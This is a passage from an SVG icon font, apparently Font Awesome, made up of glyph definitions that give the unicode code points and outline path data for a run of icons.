q13 139 -109 139q-57 0 -121 -26q120 393 459 382q251 -8 236 -326z" />
    <glyph glyph-name="f27e" unicode="&#xf27e;" 
d="M0 1408h1536v-1536h-1536v1536zM1085 293l-221 631l221 297h-634l221 -297l-221 -631l317 -304z" />
    <glyph glyph-name="uniF280" unicode="&#xf280;" 
d="M0 1408h1536v-1536h-1536v1536zM908 1088l-12 -33l75 -83l-31 -114l25 -25l107 57l107 -57l25 25l-31 114l75 83l-12 33h-95l-53 96h-32l-53 -96h-95zM641 925q32 0 44.5 -16t11.5 -63l174 21q0 55 -17.5 92.5t-50.5 56t-69 25.5t-85 7q-133 0 -199 -57.5t-66 -182.5v-72
h-96v-128h76q20 0 20 -8v-382q0 -14 -5 -20t-18 -7l-73 -7v-88h448v86l-149 14q-6 1 -8.5 1.5t-3.5 2.5t-0.5 4t1 7t0.5 10v387h191l38 128h-231q-6 0 -2 6t4 9v80q0 27 1.5 40.5t7.5 28t19.5 20t36.5 5.5zM1248 96v86l-54 9q-7 1 -9.5 2.5t-2.5 3t1 7.5t1 12v520h-275
l-23 -101l83 -22q23 -7 23 -27v-370q0 -14 -6 -18.5t-20 -6.5l-70 -9v-86h352z" />
    <glyph glyph-name="uniF281" unicode="&#xf281;" horiz-adv-x="1792" 
d="M1792 690q0 -58 -29.5 -105.5t-79.5 -72.5q12 -46 12 -96q0 -155 -106.5 -287t-290.5 -208.5t-400 -76.5t-399.5 76.5t-290 208.5t-106.5 287q0 47 11 94q-51 25 -82 73.5t-31 106.5q0 82 58 140.5t141 58.5q85 0 145 -63q218 152 515 162l116 521q3 13 15 21t26 5
l369 -81q18 37 54 59.5t79 22.5q62 0 106 -43.5t44 -105.5t-44 -106t-106 -44t-105.5 43.5t-43.5 105.5l-334 74l-104 -472q300 -9 519 -160q58 61 143 61q83 0 141 -58.5t58 -140.5zM418 491q0 -62 43.5 -106t105.5 -44t106 44t44 106t-44 105.5t-106 43.5q-61 0 -105 -44
t-44 -105zM1228 136q11 11 11 26t-11 26q-10 10 -25 10t-26 -10q-41 -42 -121 -62t-160 -20t-160 20t-121 62q-11 10 -26 10t-25 -10q-11 -10 -11 -25.5t11 -26.5q43 -43 118.5 -68t122.5 -29.5t91 -4.5t91 4.5t122.5 29.5t118.5 68zM1225 341q62 0 105.5 44t43.5 106
q0 61 -44 105t-105 44q-62 0 -106 -43.5t-44 -105.5t44 -106t106 -44z" />
    <glyph glyph-name="_602" unicode="&#xf282;" horiz-adv-x="1792" 
d="M69 741h1q16 126 58.5 241.5t115 217t167.5 176t223.5 117.5t276.5 43q231 0 414 -105.5t294 -303.5q104 -187 104 -442v-188h-1125q1 -111 53.5 -192.5t136.5 -122.5t189.5 -57t213 -3t208 46.5t173.5 84.5v-377q-92 -55 -229.5 -92t-312.5 -38t-316 53
q-189 73 -311.5 249t-124.5 372q-3 242 111 412t325 268q-48 -60 -78 -125.5t-46 -159.5h635q8 77 -8 140t-47 101.5t-70.5 66.5t-80.5 41t-75 20.5t-56 8.5l-22 1q-135 -5 -259.5 -44.5t-223.5 -104.5t-176 -140.5t-138 -163.5z" />
    <glyph glyph-name="_603" unicode="&#xf283;" horiz-adv-x="2304" 
d="M0 32v608h2304v-608q0 -66 -47 -113t-113 -47h-1984q-66 0 -113 47t-47 113zM640 256v-128h384v128h-384zM256 256v-128h256v128h-256zM2144 1408q66 0 113 -47t47 -113v-224h-2304v224q0 66 47 113t113 47h1984z" />
    <glyph glyph-name="_604" unicode="&#xf284;" horiz-adv-x="1792" 
d="M1584 246l-218 111q-74 -120 -196.5 -189t-263.5 -69q-147 0 -271 72t-196 196t-72 270q0 110 42.5 209.5t115 172t172 115t209.5 42.5q131 0 247.5 -60.5t192.5 -168.5l215 125q-110 169 -286.5 265t-378.5 96q-161 0 -308 -63t-253 -169t-169 -253t-63 -308t63 -308
t169 -253t253 -169t308 -63q213 0 397.5 107t290.5 292zM1030 643l693 -352q-116 -253 -334.5 -400t-492.5 -147q-182 0 -348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71q260 0 470.5 -133.5t335.5 -366.5zM1543 640h-39v-160h-96v352h136q32 0 54.5 -20
t28.5 -48t1 -56t-27.5 -48t-57.5 -20z" />
    <glyph glyph-name="uniF285" unicode="&#xf285;" horiz-adv-x="1792" 
d="M1427 827l-614 386l92 151h855zM405 562l-184 116v858l1183 -743zM1424 697l147 -95v-858l-532 335zM1387 718l-500 -802h-855l356 571z" />
    <glyph glyph-name="uniF286" unicode="&#xf286;" horiz-adv-x="1792" 
d="M640 528v224q0 16 -16 16h-96q-16 0 -16 -16v-224q0 -16 16 -16h96q16 0 16 16zM1152 528v224q0 16 -16 16h-96q-16 0 -16 -16v-224q0 -16 16 -16h96q16 0 16 16zM1664 496v-752h-640v320q0 80 -56 136t-136 56t-136 -56t-56 -136v-320h-640v752q0 16 16 16h96
q16 0 16 -16v-112h128v624q0 16 16 16h96q16 0 16 -16v-112h128v112q0 16 16 16h96q16 0 16 -16v-112h128v112q0 6 2.5 9.5t8.5 5t9.5 2t11.5 0t9 -0.5v391q-32 15 -32 50q0 23 16.5 39t38.5 16t38.5 -16t16.5 -39q0 -35 -32 -50v-17q45 10 83 10q21 0 59.5 -7.5t54.5 -7.5
q17 0 47 7.5t37 7.5q16 0 16 -16v-210q0 -15 -35 -21.5t-62 -6.5q-18 0 -54.5 7.5t-55.5 7.5q-40 0 -90 -12v-133q1 0 9 0.5t11.5 0t9.5 -2t8.5 -5t2.5 -9.5v-112h128v112q0 16 16 16h96q16 0 16 -16v-112h128v112q0 16 16 16h96q16 0 16 -16v-624h128v112q0 16 16 16h96
q16 0 16 -16z" />
    <glyph glyph-name="_607" unicode="&#xf287;" horiz-adv-x="2304" 
d="M2288 731q16 -8 16 -27t-16 -27l-320 -192q-8 -5 -16 -5q-9 0 -16 4q-16 10 -16 28v128h-858q37 -58 83 -165q16 -37 24.5 -55t24 -49t27 -47t27 -34t31.5 -26t33 -8h96v96q0 14 9 23t23 9h320q14 0 23 -9t9 -23v-320q0 -14 -9 -23t-23 -9h-320q-14 0 -23 9t-9 23v96h-96
q-32 0 -61 10t-51 23.5t-45 40.5t-37 46t-33.5 57t-28.5 57.5t-28 60.5q-23 53 -37 81.5t-36 65t-44.5 53.5t-46.5 17h-360q-22 -84 -91 -138t-157 -54q-106 0 -181 75t-75 181t75 181t181 75q88 0 157 -54t91 -138h104q24 0 46.5 17t44.5 53.5t36 65t37 81.5q19 41 28 60.5
t28.5 57.5t33.5 57t37 46t45 40.5t51 23.5t61 10h107q21 57 70 92.5t111 35.5q80 0 136 -56t56 -136t-56 -136t-136 -56q-62 0 -111 35.5t-70 92.5h-107q-17 0 -33 -8t-31.5 -26t-27 -34t-27 -47t-24 -49t-24.5 -55q-46 -107 -83 -165h1114v128q0 18 16 28t32 -1z" />
    <glyph glyph-name="_608" unicode="&#xf288;" horiz-adv-x="1792" 
d="M1150 774q0 -56 -39.5 -95t-95.5 -39h-253v269h253q56 0 95.5 -39.5t39.5 -95.5zM1329 774q0 130 -91.5 222t-222.5 92h-433v-896h180v269h253q130 0 222 91.5t92 221.5zM1792 640q0 -182 -71 -348t-191 -286t-286 -191t-348 -71t-348 71t-286 191t-191 286t-71 348
t71 348t191 286t286 191t348 71t348 -71t286 -191t191 -286t71 -348z" />
    <glyph glyph-name="_609" unicode="&#xf289;" horiz-adv-x="2304" 
d="M1645 438q0 59 -34 106.5t-87 68.5q-7 -45 -23 -92q-7 -24 -27.5 -38t-44.5 -14q-12 0 -24 3q-31 10 -45 38.5t-4 58.5q23 71 23 143q0 123 -61 227.5t-166 165.5t-228 61q-134 0 -247 -73t-167 -194q108 -28 188 -106q22 -23 22 -55t-22 -54t-54 -22t-55 22
q-75 75 -180 75q-106 0 -181 -74.5t-75 -180.5t75 -180.5t181 -74.5h1046q79 0 134.5 55.5t55.5 133.5zM1798 438q0 -142 -100.5 -242t-242.5 -100h-1046q-169 0 -289 119.5t-120 288.5q0 153 100 267t249 136q62 184 221 298t354 114q235 0 408.5 -158.5t196.5 -389.5
q116 -25 192.5 -118.5t76.5 -214.5zM2048 438q0 -175 -97 -319q-23 -33 -64 -33q-24 0 -43 13q-26 17 -32 48.5t12 57.5q71 104 71 233t-71 233q-18 26 -12 57t32 49t57.5 11.5t49.5 -32.5q97 -142 97 -318zM2304 438q0 -244 -134 -443q-23 -34 -64 -34q-23 0 -42 13
q-26 18 -32.5 49t11.5 57q108 164 108 358q0 195 -108 357q-18 26 -11.5 57.5t32.5 48.5q26 18 57 12t49 -33q134 -198 134 -442z" />
    <glyph glyph-name="_610" unicode="&#xf28a;" 
d="M1500 -13q0 -89 -63 -152.5t-153 -63.5t-153.5 63.5t-63.5 152.5q0 90 63.5 153.5t153.5 63.5t153 -63.5t63 -153.5zM1267 268q-115 -15 -192.5 -102.5t-77.5 -205.5q0 -74 33 -138q-146 -78 -379 -78q-109 0 -201 21t-153.5 54.5t-110.5 76.5t-76 85t-44.5 83
t-23.5 66.5t-6 39.5q0 19 4.5 42.5t18.5 56t36.5 58t64 43.5t94.5 18t94 -17.5t63 -41t35.5 -53t17.5 -49t4 -33.5q0 -34 -23 -81q28 -27 82 -42t93 -17l40 -1q115 0 190 51t75 133q0 26 -9 48.5t-31.5 44.5t-49.5 41t-74 44t-93.5 47.5t-119.5 56.5q-28 13 -43 20
q-116 55 -187 100t-122.5 102t-72 125.5t-20.5 162.5q0 78 20.5 150t66 137.5t112.5 114t166.5 77t221.5 28.5q120 0 220 -26t164.5 -67t109.5 -94t64 -105.5t19 -103.5q0 -46 -15 -82.5t-36.5 -58t-48.5 -36t-49 -19.5t-39 -5h-8h-32t-39 5t-44 14t-41 28t-37 46t-24 70.5
t-10 97.5q-15 16 -59 25.5t-81 10.5l-37 1q-68 0 -117.5 -31t-70.5 -70t-21 -76q0 -24 5 -43t24 -46t53 -51t97 -53.5t150 -58.5q76 -25 138.5 -53.5t109 -55.5t83 -59t60.5 -59.5t41 -62.5t26.5 -62t14.5 -63.5t6 -62t1 -62.5z" />
    <glyph glyph-name="_611" unicode="&#xf28b;" 
d="M704 352v576q0 14 -9 23t-23 9h-256q-14 0 -23 -9t-9 -23v-576q0 -14 9 -23t23 -9h256q14 0 23 9t9 23zM1152 352v576q0 14 -9 23t-23 9h-256q-14 0 -23 -9t-9 -23v-576q0 -14 9 -23t23 -9h256q14 0 23 9t9 23zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103
t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="_612" unicode="&#xf28c;" 
d="M768 1408q209 0 385.5 -103t279.5 -279.5t103 -385.5t-103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103zM768 96q148 0 273 73t198 198t73 273t-73 273t-198 198t-273 73t-273 -73t-198 -198t-73 -273
t73 -273t198 -198t273 -73zM864 320q-14 0 -23 9t-9 23v576q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-576q0 -14 -9 -23t-23 -9h-192zM480 320q-14 0 -23 9t-9 23v576q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-576q0 -14 -9 -23t-23 -9h-192z" />
    <glyph glyph-name="_613" unicode="&#xf28d;" 
d="M1088 352v576q0 14 -9 23t-23 9h-576q-14 0 -23 -9t-9 -23v-576q0 -14 9 -23t23 -9h576q14 0 23 9t9 23zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5
t103 -385.5z" />
    <glyph glyph-name="_614" unicode="&#xf28e;" 
d="M768 1408q209 0 385.5 -103t279.5 -279.5t103 -385.5t-103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103zM768 96q148 0 273 73t198 198t73 273t-73 273t-198 198t-273 73t-273 -73t-198 -198t-73 -273
t73 -273t198 -198t273 -73zM480 320q-14 0 -23 9t-9 23v576q0 14 9 23t23 9h576q14 0 23 -9t9 -23v-576q0 -14 -9 -23t-23 -9h-576z" />
    <glyph glyph-name="_615" unicode="&#xf290;" horiz-adv-x="1792" 
d="M1757 128l35 -313q3 -28 -16 -50q-19 -21 -48 -21h-1664q-29 0 -48 21q-19 22 -16 50l35 313h1722zM1664 967l86 -775h-1708l86 775q3 24 21 40.5t43 16.5h256v-128q0 -53 37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5v128h384v-128q0 -53 37.5 -90.5t90.5 -37.5
t90.5 37.5t37.5 90.5v128h256q25 0 43 -16.5t21 -40.5zM1280 1152v-256q0 -26 -19 -45t-45 -19t-45 19t-19 45v256q0 106 -75 181t-181 75t-181 -75t-75 -181v-256q0 -26 -19 -45t-45 -19t-45 19t-19 45v256q0 159 112.5 271.5t271.5 112.5t271.5 -112.5t112.5 -271.5z" />
    <glyph glyph-name="_616" unicode="&#xf291;" horiz-adv-x="2048" 
d="M1920 768q53 0 90.5 -37.5t37.5 -90.5t-37.5 -90.5t-90.5 -37.5h-15l-115 -662q-8 -46 -44 -76t-82 -30h-1280q-46 0 -82 30t-44 76l-115 662h-15q-53 0 -90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5h1792zM485 -32q26 2 43.5 22.5t15.5 46.5l-32 416q-2 26 -22.5 43.5
t-46.5 15.5t-43.5 -22.5t-15.5 -46.5l32 -416q2 -25 20.5 -42t43.5 -17h5zM896 32v416q0 26 -19 45t-45 19t-45 -19t-19 -45v-416q0 -26 19 -45t45 -19t45 19t19 45zM1280 32v416q0 26 -19 45t-45 19t-45 -19t-19 -45v-416q0 -26 19 -45t45 -19t45 19t19 45zM1632 27l32 416
q2 26 -15.5 46.5t-43.5 22.5t-46.5 -15.5t-22.5 -43.5l-32 -416q-2 -26 15.5 -46.5t43.5 -22.5h5q25 0 43.5 17t20.5 42zM476 1244l-93 -412h-132l101 441q19 88 89 143.5t160 55.5h167q0 26 19 45t45 19h384q26 0 45 -19t19 -45h167q90 0 160 -55.5t89 -143.5l101 -441
h-132l-93 412q-11 44 -45.5 72t-79.5 28h-167q0 -26 -19 -45t-45 -19h-384q-26 0 -45 19t-19 45h-167q-45 0 -79.5 -28t-45.5 -72z" />
    <glyph glyph-name="_617" unicode="&#xf292;" horiz-adv-x="1792" 
d="M991 512l64 256h-254l-64 -256h254zM1759 1016l-56 -224q-7 -24 -31 -24h-327l-64 -256h311q15 0 25 -12q10 -14 6 -28l-56 -224q-5 -24 -31 -24h-327l-81 -328q-7 -24 -31 -24h-224q-16 0 -26 12q-9 12 -6 28l78 312h-254l-81 -328q-7 -24 -31 -24h-225q-15 0 -25 12
q-9 12 -6 28l78 312h-311q-15 0 -25 12q-9 12 -6 28l56 224q7 24 31 24h327l64 256h-311q-15 0 -25 12q-10 14 -6 28l56 224q5 24 31 24h327l81 328q7 24 32 24h224q15 0 25 -12q9 -12 6 -28l-78 -312h254l81 328q7 24 32 24h224q15 0 25 -12q9 -12 6 -28l-78 -312h311
q15 0 25 -12q9 -12 6 -28z" />
    <glyph glyph-name="_618" unicode="&#xf293;" 
d="M841 483l148 -148l-149 -149zM840 1094l149 -149l-148 -148zM710 -130l464 464l-306 306l306 306l-464 464v-611l-255 255l-93 -93l320 -321l-320 -321l93 -93l255 255v-611zM1429 640q0 -209 -32 -365.5t-87.5 -257t-140.5 -162.5t-181.5 -86.5t-219.5 -24.5
t-219.5 24.5t-181.5 86.5t-140.5 162.5t-87.5 257t-32 365.5t32 365.5t87.5 257t140.5 162.5t181.5 86.5t219.5 24.5t219.5 -24.5t181.5 -86.5t140.5 -162.5t87.5 -257t32 -365.5z" />
    <glyph glyph-name="_619" unicode="&#xf294;" horiz-adv-x="1024" 
d="M596 113l173 172l-173 172v-344zM596 823l173 172l-173 172v-344zM628 640l356 -356l-539 -540v711l-297 -296l-108 108l372 373l-372 373l108 108l297 -296v711l539 -540z" />
    <glyph glyph-name="_620" unicode="&#xf295;" 
d="M1280 256q0 52 -38 90t-90 38t-90 -38t-38 -90t38 -90t90 -38t90 38t38 90zM512 1024q0 52 -38 90t-90 38t-90 -38t-38 -90t38 -90t90 -38t90 38t38 90zM1536 256q0 -159 -112.5 -271.5t-271.5 -112.5t-271.5 112.5t-112.5 271.5t112.5 271.5t271.5 112.5t271.5 -112.5
t112.5 -271.5zM1440 1344q0 -20 -13 -38l-1056 -1408q-19 -26 -51 -26h-160q-26 0 -45 19t-19 45q0 20 13 38l1056 1408q19 26 51 26h160q26 0 45 -19t19 -45zM768 1024q0 -159 -112.5 -271.5t-271.5 -112.5t-271.5 112.5t-112.5 271.5t112.5 271.5t271.5 112.5
t271.5 -112.5t112.5 -271.5z" />
    <glyph glyph-name="_621" unicode="&#xf296;" horiz-adv-x="1792" 
d="M104 830l792 -1015l-868 630q-18 13 -25 34.5t0 42.5l101 308v0zM566 830h660l-330 -1015v0zM368 1442l198 -612h-462l198 612q8 23 33 23t33 -23zM1688 830l101 -308q7 -21 0 -42.5t-25 -34.5l-868 -630l792 1015v0zM1688 830h-462l198 612q8 23 33 23t33 -23z" />
    <glyph glyph-name="_622" unicode="&#xf297;" horiz-adv-x="1792" 
d="M384 704h160v224h-160v-224zM1221 372v92q-104 -36 -243 -38q-135 -1 -259.5 46.5t-220.5 122.5l1 -96q88 -80 212 -128.5t272 -47.5q129 0 238 49zM640 704h640v224h-640v-224zM1792 736q0 -187 -99 -352q89 -102 89 -229q0 -157 -129.5 -268t-313.5 -111
q-122 0 -225 52.5t-161 140.5q-19 -1 -57 -1t-57 1q-58 -88 -161 -140.5t-225 -52.5q-184 0 -313.5 111t-129.5 268q0 127 89 229q-99 165 -99 352q0 209 120 385.5t326.5 279.5t449.5 103t449.5 -103t326.5 -279.5t120 -385.5z" />
    <glyph glyph-name="_623" unicode="&#xf298;" 
d="M515 625v-128h-252v128h252zM515 880v-127h-252v127h252zM1273 369v-128h-341v128h341zM1273 625v-128h-672v128h672zM1273 880v-127h-672v127h672zM1408 20v1240q0 8 -6 14t-14 6h-32l-378 -256l-210 171l-210 -171l-378 256h-32q-8 0 -14 -6t-6 -14v-1240q0 -8 6 -14
t14 -6h1240q8 0 14 6t6 14zM553 1130l185 150h-406zM983 1130l221 150h-406zM1536 1260v-1240q0 -62 -43 -105t-105 -43h-1240q-62 0 -105 43t-43 105v1240q0 62 43 105t105 43h1240q62 0 105 -43t43 -105z" />
    <glyph glyph-name="_624" unicode="&#xf299;" horiz-adv-x="1792" 
d="M896 720q-104 196 -160 278q-139 202 -347 318q-34 19 -70 36q-89 40 -94 32t34 -38l39 -31q62 -43 112.5 -93.5t94.5 -116.5t70.5 -113t70.5 -131q9 -17 13 -25q44 -84 84 -153t98 -154t115.5 -150t131 -123.5t148.5 -90.5q153 -66 154 -60q1 3 -49 37q-53 36 -81 57
q-77 58 -179 211t-185 310zM549 177q-76 60 -132.5 125t-98 143.5t-71 154.5t-58.5 186t-52 209t-60.5 252t-76.5 289q273 0 497.5 -36t379 -92t271 -144.5t185.5 -172.5t110 -198.5t56 -199.5t12.5 -198.5t-9.5 -173t-20 -143.5t-13 -107l323 -327h-104l-281 285
q-22 -2 -91.5 -14t-121.5 -19t-138 -6t-160.5 17t-167.5 59t-179 111z" />
    <glyph glyph-name="_625" unicode="&#xf29a;" horiz-adv-x="1792" 
d="M1374 879q-6 26 -28.5 39.5t-48.5 7.5q-261 -62 -401 -62t-401 62q-26 6 -48.5 -7.5t-28.5 -39.5t7.5 -48.5t39.5 -28.5q194 -46 303 -58q-2 -158 -15.5 -269t-26.5 -155.5t-41 -115.5l-9 -21q-10 -25 1 -49t36 -34q9 -4 23 -4q44 0 60 41l8 20q54 139 71 259h42
q17 -120 71 -259l8 -20q16 -41 60 -41q14 0 23 4q25 10 36 34t1 49l-9 21q-28 71 -41 115.5t-26.5 155.5t-15.5 269q109 12 303 58q26 6 39.5 28.5t7.5 48.5zM1024 1024q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5z
M1600 640q0 -143 -55.5 -273.5t-150 -225t-225 -150t-273.5 -55.5t-273.5 55.5t-225 150t-150 225t-55.5 273.5t55.5 273.5t150 225t225 150t273.5 55.5t273.5 -55.5t225 -150t150 -225t55.5 -273.5zM896 1408q-156 0 -298 -61t-245 -164t-164 -245t-61 -298t61 -298
t164 -245t245 -164t298 -61t298 61t245 164t164 245t61 298t-61 298t-164 245t-245 164t-298 61zM1792 640q0 -182 -71 -348t-191 -286t-286 -191t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71t348 -71t286 -191t191 -286t71 -348z" />
    <glyph glyph-name="_626" unicode="&#xf29b;" 
d="M1438 723q34 -35 29 -82l-44 -551q-4 -42 -34.5 -70t-71.5 -28q-6 0 -9 1q-44 3 -72.5 36.5t-25.5 77.5l35 429l-143 -8q55 -113 55 -240q0 -216 -148 -372l-137 137q91 101 91 235q0 145 -102.5 248t-247.5 103q-134 0 -236 -92l-137 138q120 114 284 141l264 300
l-149 87l-181 -161q-33 -30 -77 -27.5t-73 35.5t-26.5 77t34.5 73l239 213q26 23 60 26.5t64 -14.5l488 -283q36 -21 48 -68q17 -67 -26 -117l-205 -232l371 20q49 3 83 -32zM1240 1180q-74 0 -126 52t-52 126t52 126t126 52t126.5 -52t52.5 -126t-52.5 -126t-126.5 -52z
M613 -62q106 0 196 61l139 -139q-146 -116 -335 -116q-148 0 -273.5 73t-198.5 198t-73 273q0 188 116 336l139 -139q-60 -88 -60 -197q0 -145 102.5 -247.5t247.5 -102.5z" />
    <glyph glyph-name="_627" unicode="&#xf29c;" 
d="M880 336v-160q0 -14 -9 -23t-23 -9h-160q-14 0 -23 9t-9 23v160q0 14 9 23t23 9h160q14 0 23 -9t9 -23zM1136 832q0 -50 -15 -90t-45.5 -69t-52 -44t-59.5 -36q-32 -18 -46.5 -28t-26 -24t-11.5 -29v-32q0 -14 -9 -23t-23 -9h-160q-14 0 -23 9t-9 23v68q0 35 10.5 64.5
t24 47.5t39 35.5t41 25.5t44.5 21q53 25 75 43t22 49q0 42 -43.5 71.5t-95.5 29.5q-56 0 -95 -27q-29 -20 -80 -83q-9 -12 -25 -12q-11 0 -19 6l-108 82q-10 7 -12 20t5 23q122 192 349 192q129 0 238.5 -89.5t109.5 -214.5zM768 1280q-130 0 -248.5 -51t-204 -136.5
t-136.5 -204t-51 -248.5t51 -248.5t136.5 -204t204 -136.5t248.5 -51t248.5 51t204 136.5t136.5 204t51 248.5t-51 248.5t-136.5 204t-204 136.5t-248.5 51zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5
t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="_628" unicode="&#xf29d;" horiz-adv-x="1408" 
d="M366 1225q-64 0 -110 45.5t-46 110.5q0 64 46 109.5t110 45.5t109.5 -45.5t45.5 -109.5q0 -65 -45.5 -110.5t-109.5 -45.5zM917 583q0 -50 -30 -67.5t-63.5 -6.5t-47.5 34l-367 438q-7 12 -14 15.5t-11 1.5l-3 -3q-7 -8 4 -21l122 -139l1 -354l-161 -457
q-67 -192 -92 -234q-15 -26 -28 -32q-50 -26 -103 -1q-29 13 -41.5 43t-9.5 57q2 17 197 618l5 416l-85 -164l35 -222q4 -24 -1 -42t-14 -27.5t-19 -16t-17 -7.5l-7 -2q-19 -3 -34.5 3t-24 16t-14 22t-7.5 19.5t-2 9.5l-46 299l211 381q23 34 113 34q75 0 107 -40l424 -521
q7 -5 14 -17l3 -3l-1 -1q7 -13 7 -29zM514 433q43 -113 88.5 -225t69.5 -168l24 -55q36 -93 42 -125q11 -70 -36 -97q-35 -22 -66 -16t-51 22t-29 35h-1q-6 16 -8 25l-124 351zM1338 -159q31 -49 31 -57q0 -5 -3 -7q-9 -5 -14.5 0.5t-15.5 26t-16 30.5q-114 172 -423 661
q3 -1 7 1t7 4l3 2q11 9 11 17z" />
    <glyph glyph-name="_629" unicode="&#xf29e;" horiz-adv-x="2304" 
d="M504 542h171l-1 265zM1530 641q0 87 -50.5 140t-146.5 53h-54v-388h52q91 0 145 57t54 138zM956 1018l1 -756q0 -14 -9.5 -24t-23.5 -10h-216q-14 0 -23.5 10t-9.5 24v62h-291l-55 -81q-10 -15 -28 -15h-267q-21 0 -30.5 18t3.5 35l556 757q9 14 27 14h332q14 0 24 -10
t10 -24zM1783 641q0 -193 -125.5 -303t-324.5 -110h-270q-14 0 -24 10t-10 24v756q0 14 10 24t24 10h268q200 0 326 -109t126 -302zM1939 640q0 -11 -0.5 -29t-8 -71.5t-21.5 -102t-44.5 -108t-73.5 -102.5h-51q38 45 66.5 104.5t41.5 112t21 98t9 72.5l1 27q0 8 -0.5 22.5
t-7.5 60t-20 91.5t-41 111.5t-66 124.5h43q41 -47 72 -107t45.5 -111.5t23 -96t10.5 -70.5zM2123 640q0 -11 -0.5 -29t-8 -71.5t-21.5 -102t-45 -108t-74 -102.5h-51q38 45 66.5 104.5t41.5 112t21 98t9 72.5l1 27q0 8 -0.5 22.5t-7.5 60t-19.5 91.5t-40.5 111.5t-66 124.5
h43q41 -47 72 -107t45.5 -111.5t23 -96t10.5 -70.5zM2304 640q0 -11 -0.5 -29t-8 -71.5t-21.5 -102t-44.5 -108t-73.5 -102.5h-51q38 45 66 104.5t41 112t21 98t9 72.5l1 27q0 8 -0.5 22.5t-7.5 60t-19.5 91.5t-40.5 111.5t-66 124.5h43q41 -47 72 -107t45.5 -111.5t23 -96
t9.5 -70.5z" />
    <glyph glyph-name="uniF2A0" unicode="&#xf2a0;" horiz-adv-x="1408" 
d="M617 -153q0 11 -13 58t-31 107t-20 69q-1 4 -5 26.5t-8.5 36t-13.5 21.5q-15 14 -51 14q-23 0 -70 -5.5t-71 -5.5q-34 0 -47 11q-6 5 -11 15.5t-7.5 20t-6.5 24t-5 18.5q-37 128 -37 255t37 255q1 4 5 18.5t6.5 24t7.5 20t11 15.5q13 11 47 11q24 0 71 -5.5t70 -5.5
q36 0 51 14q9 8 13.5 21.5t8.5 36t5 26.5q2 9 20 69t31 107t13 58q0 22 -43.5 52.5t-75.5 42.5q-20 8 -45 8q-34 0 -98 -18q-57 -17 -96.5 -40.5t-71 -66t-46 -70t-45.5 -94.5q-6 -12 -9 -19q-49 -107 -68 -216t-19 -244t19 -244t68 -216q56 -122 83 -161q63 -91 179 -127
l6 -2q64 -18 98 -18q25 0 45 8q32 12 75.5 42.5t43.5 52.5zM776 760q-26 0 -45 19t-19 45.5t19 45.5q37 37 37 90q0 52 -37 91q-19 19 -19 45t19 45t45 19t45 -19q75 -75 75 -181t-75 -181q-21 -19 -45 -19zM957 579q-27 0 -45 19q-19 19 -19 45t19 45q112 114 112 272
t-112 272q-19 19 -19 45t19 45t45 19t45 -19q150 -150 150 -362t-150 -362q-18 -19 -45 -19zM1138 398q-27 0 -45 19q-19 19 -19 45t19 45q90 91 138.5 208t48.5 245t-48.5 245t-138.5 208q-19 19 -19 45t19 45t45 19t45 -19q109 -109 167 -249t58 -294t-58 -294t-167 -249
q-18 -19 -45 -19z" />
    <glyph glyph-name="uniF2A1" unicode="&#xf2a1;" horiz-adv-x="2176" 
d="M192 352q-66 0 -113 -47t-47 -113t47 -113t113 -47t113 47t47 113t-47 113t-113 47zM704 352q-66 0 -113 -47t-47 -113t47 -113t113 -47t113 47t47 113t-47 113t-113 47zM704 864q-66 0 -113 -47t-47 -113t47 -113t113 -47t113 47t47 113t-47 113t-113 47zM1472 352
q-66 0 -113 -47t-47 -113t47 -113t113 -47t113 47t47 113t-47 113t-113 47zM1984 352q-66 0 -113 -47t-47 -113t47 -113t113 -47t113 47t47 113t-47 113t-113 47zM1472 864q-66 0 -113 -47t-47 -113t47 -113t113 -47t113 47t47 113t-47 113t-113 47zM1984 864
q-66 0 -113 -47t-47 -113t47 -113t113 -47t113 47t47 113t-47 113t-113 47zM1984 1376q-66 0 -113 -47t-47 -113t47 -113t113 -47t113 47t47 113t-47 113t-113 47zM384 192q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM896 192q0 -80 -56 -136
t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM384 704q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM896 704q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM384 1216q0 -80 -56 -136t-136 -56
t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM1664 192q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM896 1216q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM2176 192q0 -80 -56 -136t-136 -56t-136 56
t-56 136t56 136t136 56t136 -56t56 -136zM1664 704q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM2176 704q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM1664 1216q0 -80 -56 -136t-136 -56t-136 56t-56 136
t56 136t136 56t136 -56t56 -136zM2176 1216q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136z" />
    <glyph glyph-name="uniF2A2" unicode="&#xf2a2;" horiz-adv-x="1792" 
